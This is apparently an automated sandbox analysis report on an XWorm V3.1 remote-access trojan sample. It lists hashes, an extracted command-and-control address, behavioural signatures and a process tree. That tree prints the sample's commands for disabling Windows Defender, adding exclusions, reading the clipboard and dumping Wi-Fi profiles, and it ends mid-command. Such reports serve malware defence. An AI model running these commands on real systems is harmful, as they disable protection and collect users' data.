Analysis
-
max time kernel
145s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
07-09-2024 11:28
Behavioral task
behavioral1
Sample
XWorm-V3.1-main/XWorm V3.1.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
XWorm-V3.1-main/XWorm V3.1.exe
Resource
win10v2004-20240802-en
General
-
Target
XWorm-V3.1-main/XWorm V3.1.exe
-
Size
13.5MB
-
MD5
32dcf4cd512da44a9d2a66f167da02e7
-
SHA1
4224b58657428bb6edb85c73be85a9bcffb46c09
-
SHA256
0d51c076489c1f892c81460633b8780dbf257ae2f3798d727a138d741ac132f2
-
SHA512
6e0b843930ac48adad31f95e45fc2252bb0194b202be5d995b98b6ef926427e33e8b7be5ecf7615440ec314a4971a007ccf1c08b083ebae1217dbbc135320069
-
SSDEEP
393216:myjEZpRN3b67r3f4/fxU8IWUIURsLBHiEZhQfbx7P5kvxT:zEZp+3Q/JU8b5YIBHNCfF7P5kv1
Malware Config
Extracted
xworm
3.0
18.ip.gl.ply.gg:35094
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x000a00000002343d-47.dat family_xworm behavioral2/memory/2108-76-0x00000000006B0000-0x00000000006C4000-memory.dmp family_xworm -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 8 3916 XWorm V3.1.exe -
pid Process 4644 powershell.exe 4316 powershell.exe 2964 powershell.exe 4800 powershell.exe 2072 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation XWorm V3.1.exe Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation XWorm V3.1.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3612 powershell.exe 2672 cmd.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X.lnk X.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X.lnk X.exe -
Executes dropped EXE 6 IoCs
pid Process 3916 XWorm V3.1.exe 2452 XWorm V3.1.exe 2524 XWorm.exe 2108 X.exe 1108 XWorm.exe 1148 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe 1108 XWorm.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000700000002355c-79.dat upx behavioral2/memory/1108-83-0x00007FFF85780000-0x00007FFF85D70000-memory.dmp upx behavioral2/files/0x000700000002354f-85.dat upx behavioral2/memory/1108-88-0x00007FFF9A4D0000-0x00007FFF9A4F4000-memory.dmp upx behavioral2/files/0x000700000002355a-87.dat upx behavioral2/files/0x0007000000023556-105.dat upx behavioral2/files/0x0007000000023555-104.dat upx behavioral2/files/0x0007000000023554-103.dat upx behavioral2/files/0x0007000000023553-102.dat upx behavioral2/files/0x0007000000023552-101.dat upx behavioral2/files/0x0007000000023551-100.dat upx behavioral2/files/0x0007000000023550-99.dat upx behavioral2/files/0x00080000000234fe-98.dat upx behavioral2/files/0x0007000000023561-97.dat upx behavioral2/files/0x0007000000023560-96.dat upx behavioral2/files/0x000700000002355f-95.dat upx behavioral2/files/0x000700000002355b-92.dat upx behavioral2/files/0x0007000000023559-91.dat upx behavioral2/memory/1108-106-0x00007FFF9B550000-0x00007FFF9B55F000-memory.dmp upx behavioral2/memory/1108-121-0x00007FFF85110000-0x00007FFF85286000-memory.dmp upx behavioral2/memory/1108-131-0x00007FFF9A8D0000-0x00007FFF9A903000-memory.dmp upx behavioral2/memory/1108-132-0x00007FFF828E0000-0x00007FFF82E09000-memory.dmp upx behavioral2/memory/1108-135-0x00007FFF9A4D0000-0x00007FFF9A4F4000-memory.dmp upx behavioral2/memory/1108-134-0x00007FFF8BBA0000-0x00007FFF8BC6D000-memory.dmp upx behavioral2/memory/1108-130-0x00007FFF85780000-0x00007FFF85D70000-memory.dmp upx behavioral2/memory/1108-125-0x00007FFF9AAD0000-0x00007FFF9AADD000-memory.dmp upx behavioral2/memory/1108-123-0x00007FFF9AAE0000-0x00007FFF9AAF9000-memory.dmp upx behavioral2/memory/1108-119-0x00007FFF9AB00000-0x00007FFF9AB23000-memory.dmp upx behavioral2/memory/1108-117-0x00007FFF9B560000-0x00007FFF9B579000-memory.dmp upx behavioral2/memory/1108-115-0x00007FFF9AB30000-0x00007FFF9AB5D000-memory.dmp upx behavioral2/memory/1108-139-0x00007FFF9A8C0000-0x00007FFF9A8CD000-memory.dmp upx behavioral2/memory/1108-144-0x00007FFF84FF0000-0x00007FFF8510C000-memory.dmp upx behavioral2/memory/1108-137-0x00007FFF9A4B0000-0x00007FFF9A4C4000-memory.dmp upx behavioral2/memory/1108-255-0x00007FFF9AB00000-0x00007FFF9AB23000-memory.dmp upx behavioral2/memory/1108-309-0x00007FFF85110000-0x00007FFF85286000-memory.dmp upx behavioral2/memory/1108-363-0x00007FFF9AAE0000-0x00007FFF9AAF9000-memory.dmp upx behavioral2/memory/1108-392-0x00007FFF828E0000-0x00007FFF82E09000-memory.dmp upx behavioral2/memory/1108-391-0x00007FFF9A8D0000-0x00007FFF9A903000-memory.dmp upx behavioral2/memory/1108-394-0x00007FFF8BBA0000-0x00007FFF8BC6D000-memory.dmp upx behavioral2/memory/1108-401-0x00007FFF85110000-0x00007FFF85286000-memory.dmp upx behavioral2/memory/1108-396-0x00007FFF9A4D0000-0x00007FFF9A4F4000-memory.dmp upx behavioral2/memory/1108-409-0x00007FFF84FF0000-0x00007FFF8510C000-memory.dmp upx behavioral2/memory/1108-408-0x00007FFF9A8C0000-0x00007FFF9A8CD000-memory.dmp upx behavioral2/memory/1108-395-0x00007FFF85780000-0x00007FFF85D70000-memory.dmp upx behavioral2/memory/1108-448-0x00007FFF85780000-0x00007FFF85D70000-memory.dmp upx -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XWorm = "C:\\Windows\\System32\\XWorm.exe" XWorm V3.1.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\X = "C:\\Windows\\System32\\X.exe" XWorm V3.1.exe Set value (str) \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\X = "C:\\Users\\Admin\\AppData\\Roaming\\X.exe" X.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\System32\XWorm.exe XWorm V3.1.exe File opened for modification C:\Windows\System32\XWorm.exe XWorm V3.1.exe File created C:\Windows\System32\X.exe XWorm V3.1.exe File opened for modification C:\Windows\System32\X.exe XWorm V3.1.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 4932 tasklist.exe 2664 tasklist.exe 1668 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2224 cmd.exe 4696 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3188 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3528 systeminfo.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4800 powershell.exe 4644 powershell.exe 2072 powershell.exe 4800 powershell.exe 4644 powershell.exe 4644 powershell.exe 2072 powershell.exe 2072 powershell.exe 3612 powershell.exe 3612 powershell.exe 3612 powershell.exe 3704 powershell.exe 3704 powershell.exe 3704 powershell.exe 4316 powershell.exe 4316 powershell.exe 5080 powershell.exe 5080 powershell.exe 2964 powershell.exe 2964 powershell.exe 1688 powershell.exe 1688 powershell.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3916 XWorm V3.1.exe Token: SeDebugPrivilege 2452 XWorm V3.1.exe Token: SeDebugPrivilege 2108 X.exe Token: SeDebugPrivilege 4800 powershell.exe Token: SeDebugPrivilege 4644 powershell.exe Token: SeDebugPrivilege 2072 powershell.exe Token: SeDebugPrivilege 4932 tasklist.exe Token: SeDebugPrivilege 2664 tasklist.exe Token: SeIncreaseQuotaPrivilege 4836 WMIC.exe Token: SeSecurityPrivilege 4836 WMIC.exe Token: SeTakeOwnershipPrivilege 4836 WMIC.exe Token: SeLoadDriverPrivilege 4836 WMIC.exe Token: SeSystemProfilePrivilege 4836 WMIC.exe Token: SeSystemtimePrivilege 4836 WMIC.exe Token: SeProfSingleProcessPrivilege 4836 WMIC.exe Token: SeIncBasePriorityPrivilege 4836 WMIC.exe Token: SeCreatePagefilePrivilege 4836 WMIC.exe Token: SeBackupPrivilege 4836 WMIC.exe Token: SeRestorePrivilege 4836 WMIC.exe Token: SeShutdownPrivilege 4836 WMIC.exe Token: SeDebugPrivilege 4836 WMIC.exe Token: SeSystemEnvironmentPrivilege 4836 WMIC.exe Token: SeRemoteShutdownPrivilege 4836 WMIC.exe Token: SeUndockPrivilege 4836 WMIC.exe Token: SeManageVolumePrivilege 4836 WMIC.exe Token: 33 4836 WMIC.exe Token: 34 4836 WMIC.exe Token: 35 4836 WMIC.exe Token: 36 4836 WMIC.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeIncreaseQuotaPrivilege 4836 WMIC.exe Token: SeSecurityPrivilege 4836 WMIC.exe Token: SeTakeOwnershipPrivilege 4836 WMIC.exe Token: SeLoadDriverPrivilege 4836 WMIC.exe Token: SeSystemProfilePrivilege 4836 WMIC.exe Token: SeSystemtimePrivilege 4836 WMIC.exe Token: SeProfSingleProcessPrivilege 4836 WMIC.exe Token: SeIncBasePriorityPrivilege 4836 WMIC.exe Token: SeCreatePagefilePrivilege 4836 WMIC.exe Token: SeBackupPrivilege 4836 WMIC.exe Token: SeRestorePrivilege 4836 WMIC.exe Token: SeShutdownPrivilege 4836 WMIC.exe Token: SeDebugPrivilege 4836 WMIC.exe Token: SeSystemEnvironmentPrivilege 4836 WMIC.exe Token: SeRemoteShutdownPrivilege 4836 WMIC.exe Token: SeUndockPrivilege 4836 WMIC.exe Token: SeManageVolumePrivilege 4836 WMIC.exe Token: 33 4836 WMIC.exe Token: 34 4836 WMIC.exe Token: 35 4836 WMIC.exe Token: 36 4836 WMIC.exe Token: SeDebugPrivilege 1668 tasklist.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeDebugPrivilege 5080 powershell.exe Token: SeIncreaseQuotaPrivilege 3192 WMIC.exe Token: SeSecurityPrivilege 3192 WMIC.exe Token: SeTakeOwnershipPrivilege 3192 WMIC.exe Token: SeLoadDriverPrivilege 3192 WMIC.exe Token: SeSystemProfilePrivilege 3192 WMIC.exe Token: SeSystemtimePrivilege 3192 WMIC.exe Token: SeProfSingleProcessPrivilege 3192 WMIC.exe Token: SeIncBasePriorityPrivilege 3192 WMIC.exe Token: SeCreatePagefilePrivilege 3192 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2452 XWorm V3.1.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 4696 taskmgr.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe 2452 XWorm V3.1.exe -
Suspicious use of SendNotifyMessage 63 IoCs
pid Process 2452 XWorm V3.1.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe 4696 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5008 wrote to memory of 3916 5008 XWorm V3.1.exe 168 PID 5008 wrote to memory of 3916 5008 XWorm V3.1.exe 168 PID 3916 wrote to memory of 2452 3916 XWorm V3.1.exe 86 PID 3916 wrote to memory of 2452 3916 XWorm V3.1.exe 86 PID 3916 wrote to memory of 2524 3916 XWorm V3.1.exe 87 PID 3916 wrote to memory of 2524 3916 XWorm V3.1.exe 87 PID 3916 wrote to memory of 2108 3916 XWorm V3.1.exe 88 PID 3916 wrote to memory of 2108 3916 XWorm V3.1.exe 88 PID 2524 wrote to memory of 1108 2524 XWorm.exe 89 PID 2524 wrote to memory of 1108 2524 XWorm.exe 89 PID 1108 wrote to memory of 4768 1108 XWorm.exe 90 PID 1108 wrote to memory of 4768 1108 XWorm.exe 90 PID 1108 wrote to memory of 876 1108 XWorm.exe 91 PID 1108 wrote to memory of 876 1108 XWorm.exe 91 PID 1108 wrote to memory of 968 1108 XWorm.exe 94 PID 1108 wrote to memory of 968 1108 XWorm.exe 94 PID 4768 wrote to memory of 4800 4768 cmd.exe 96 PID 4768 wrote to memory of 4800 4768 cmd.exe 96 PID 968 wrote to memory of 2072 968 cmd.exe 97 PID 968 wrote to memory of 2072 968 cmd.exe 97 PID 876 wrote to memory of 4644 876 cmd.exe 98 PID 876 wrote to memory of 4644 876 cmd.exe 98 PID 1108 wrote to memory of 392 1108 XWorm.exe 99 PID 1108 wrote to memory of 392 1108 XWorm.exe 99 PID 1108 wrote to memory of 684 1108 XWorm.exe 100 PID 1108 wrote to memory of 684 1108 XWorm.exe 100 PID 1108 wrote to memory of 4304 1108 XWorm.exe 103 PID 1108 wrote to memory of 4304 1108 XWorm.exe 103 PID 1108 wrote to memory of 2672 1108 XWorm.exe 104 PID 1108 wrote to memory of 2672 1108 XWorm.exe 104 PID 684 wrote to memory of 4932 684 cmd.exe 107 PID 684 wrote to memory of 4932 684 cmd.exe 107 PID 392 wrote to memory of 2664 392 cmd.exe 108 PID 392 wrote to memory of 2664 392 cmd.exe 108 PID 1108 wrote to memory of 4160 1108 XWorm.exe 109 PID 1108 wrote to memory of 4160 1108 XWorm.exe 109 PID 1108 wrote to memory of 3236 1108 XWorm.exe 110 PID 1108 wrote to memory of 3236 1108 XWorm.exe 110 PID 4304 wrote to memory of 4836 4304 cmd.exe 112 PID 4304 wrote to memory of 4836 4304 cmd.exe 112 PID 1108 wrote to memory of 2224 1108 XWorm.exe 113 PID 1108 wrote to memory of 2224 1108 XWorm.exe 113 PID 1108 wrote to memory of 3060 1108 XWorm.exe 116 PID 1108 wrote to memory of 3060 1108 XWorm.exe 116 PID 2672 wrote to memory of 3612 2672 cmd.exe 118 PID 2672 wrote to memory of 3612 2672 cmd.exe 118 PID 1108 wrote to memory of 2504 1108 XWorm.exe 119 PID 1108 wrote to memory of 2504 1108 XWorm.exe 119 PID 4160 wrote to memory of 1668 4160 cmd.exe 121 PID 4160 wrote to memory of 1668 4160 cmd.exe 121 PID 3236 wrote to memory of 640 3236 cmd.exe 165 PID 3236 wrote to memory of 640 3236 cmd.exe 165 PID 2224 wrote to memory of 4696 2224 cmd.exe 123 PID 2224 wrote to memory of 4696 2224 cmd.exe 123 PID 3060 wrote to memory of 3528 3060 cmd.exe 124 PID 3060 wrote to memory of 3528 3060 cmd.exe 124 PID 2504 wrote to memory of 3704 2504 cmd.exe 125 PID 2504 wrote to memory of 3704 2504 cmd.exe 125 PID 1108 wrote to memory of 4892 1108 XWorm.exe 126 PID 1108 wrote to memory of 4892 1108 XWorm.exe 126 PID 4892 wrote to memory of 3504 4892 cmd.exe 128 PID 4892 wrote to memory of 3504 4892 cmd.exe 128 PID 1108 wrote to memory of 756 1108 XWorm.exe 129 PID 1108 wrote to memory of 756 1108 XWorm.exe 129
Processes
-
C:\Users\Admin\AppData\Local\Temp\XWorm-V3.1-main\XWorm V3.1.exe"C:\Users\Admin\AppData\Local\Temp\XWorm-V3.1-main\XWorm V3.1.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe"C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe"2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Users\Admin\AppData\Local\Temp\XWorm V3.1.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V3.1.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2452
-
-
C:\Windows\System32\XWorm.exe"C:\Windows\System32\XWorm.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\System32\XWorm.exe"C:\Windows\System32\XWorm.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\XWorm.exe'"5⤵
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\XWorm.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"5⤵
- Suspicious use of WriteProcessMemory
PID:968 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
PID:4160 -
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\system32\tree.comtree /A /F6⤵PID:640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:3528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 